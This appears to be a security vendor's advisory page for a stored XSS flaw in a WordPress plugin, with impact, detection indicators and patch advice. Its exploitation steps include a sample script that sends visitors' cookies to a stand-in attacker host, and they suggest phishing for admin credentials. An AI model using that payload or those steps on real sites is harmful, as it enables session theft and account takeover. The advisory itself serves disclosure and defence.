CVE-2026-6712
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-6712 is a Stored Cross-Site Scripting (XSS) vulnerability in the Website LLMs.txt plugin for WordPress, affecting all versions up to and including 8.2.6. The flaw stems from insufficient input sanitization and output escaping in the plugin's admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts. The vulnerability is limited in scope: it only affects WordPress multi-site installations or installations where unfiltered_html has been disabled. It was published on April 21, 2026, with a CVSS v3.1 base score of 4.4 (Medium) (GitHub Advisory).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin fails to properly sanitize administrator-supplied input in its settings fields and does not escape the stored values when rendering them in page output. An authenticated attacker with administrator-level access can submit a malicious payload through the plugin's admin settings interface; the payload is stored in the database and subsequently executed in the browser of any user who visits an affected page. Exploitation requires high privileges and is constrained to multi-site WordPress environments or those with unfiltered_html disabled, which increases attack complexity (GitHub Advisory).

Impact

Successful exploitation allows an authenticated administrator to persistently inject malicious JavaScript into WordPress pages, which executes in the context of any user's browser upon visiting the affected page. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of legitimate users, or further compromise of the WordPress site. The availability impact is none, while confidentiality and integrity are both assessed as low due to the constrained scope of the attack (GitHub Advisory).

Exploitability

No public proof-of-concept exploit code is known to exist, and there is no evidence of active in-the-wild exploitation as of the time of publication. The EPSS score is approximately 0.022% (0.000220), placing it in the 9th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The high privilege requirement (administrator-level) significantly limits the practical attack surface (GitHub Advisory).

Exploitation steps

  1. Identify target: Confirm the target WordPress site is a multi-site installation or has unfiltered_html disabled, and that the Website LLMs.txt plugin version ≤ 8.2.6 is active.
  2. Obtain administrator credentials: Acquire valid WordPress administrator credentials through phishing, credential stuffing, or other means, as exploitation requires administrator-level access.
  3. Access plugin settings: Log in to the WordPress admin dashboard and navigate to the Website LLMs.txt plugin settings page.
  4. Inject malicious payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.
  5. Save settings: Submit the form to store the malicious script in the WordPress database.
  6. Trigger execution: When any user (including other administrators or site visitors) accesses a page that renders the injected setting value, the malicious script executes in their browser, potentially stealing session cookies or performing actions on their behalf (GitHub Advisory).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected changes to Website LLMs.txt plugin settings, particularly from unfamiliar IP addresses or at unusual times.
  • Database: Presence of <script> tags or JavaScript event handlers (e.g., onerror, onload) in the plugin's stored settings values in the WordPress wp_options table.
  • Network: Outbound requests from user browsers to unknown external domains shortly after visiting pages that render plugin settings output, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than the file system.

Mitigation and workarounds

The WordPress plugin repository changeset indicates a patch was applied at revision 3482210 of the website-llms-txt plugin; administrators should update to the patched version immediately (GitHub Advisory, Wordfence). As interim mitigations: restrict administrator-level access to trusted users only; on multi-site installations, review and limit which users have site administrator roles; and monitor WordPress admin settings for unauthorized changes. If the plugin is not essential to operations, consider disabling or removing it until a verified patched version is confirmed installed.

Community reactions

The vulnerability was reported by Wordfence, which maintains a threat intelligence entry for this CVE. Coverage has been limited to automated vulnerability aggregators and databases (VulDB, CVEFeed, CIRCL, INCIBE), with no notable independent researcher commentary or significant social media discussion observed, consistent with the low severity and high privilege requirement of the flaw (Wordfence).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-3174HIGH7.5
  • event-tickets
NoYesSep 08, 2026
CVE-2026-18021MEDIUM6.5
  • beaver-builder-lite-version
NoYesSep 08, 2026
CVE-2026-17509MEDIUM6.5
  • sitepress-multilingual-cms
NoYesSep 08, 2026
CVE-2026-76931MEDIUM6.4
  • zephyr-project-manager
NoYesSep 08, 2026
CVE-2026-2520MEDIUM5.4
  • bookly-responsive-appointment-booking-tool
NoYesSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management